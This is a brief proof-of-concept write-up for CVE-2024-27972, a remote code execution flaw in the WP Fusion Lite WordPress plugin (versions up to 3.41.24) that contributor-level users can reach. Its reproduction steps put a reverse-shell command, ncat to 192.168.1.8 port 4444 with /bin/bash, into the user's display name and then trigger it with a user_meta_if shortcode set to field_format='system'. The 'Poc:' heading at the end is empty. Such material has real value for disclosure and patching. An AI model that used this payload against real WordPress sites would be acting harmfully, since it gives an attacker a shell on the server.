CVE-2024-27972 WP Fusion Lite <= 3.41.24 - Authenticated (Contributor+) Remote Code Execution https://patchstack.com/database/vulnerability/wp-fusion-lite/wordpress-wp-fusion-lite-plugin-3-41-24-remote-code-execution-rce-vulnerability
File: includes\class-shortcodes.php
Show list field echo var_dump($user_meta = wp_fusion()->user->get_user_meta( $user_id ));
call_user_func: https://www.php.net/manual/en/function.call-user-func.php
Short code user_meta_if: https://wpfusion.com/documentation/getting-started/shortcodes/#displaying-content-based-on-user-meta-values
[user_meta_if field="display_name" field_format="system"] Exploit [/user_meta_if]
Steps to Reproduce:
-
Login account Contributor+ and change display name
ncat 192.168.1.8 4444 -e /bin/bash
-
Create Post and use shortcode
[user_meta_if field="display_name" field_format="system"] Exploit [/user_meta_if]
Poc: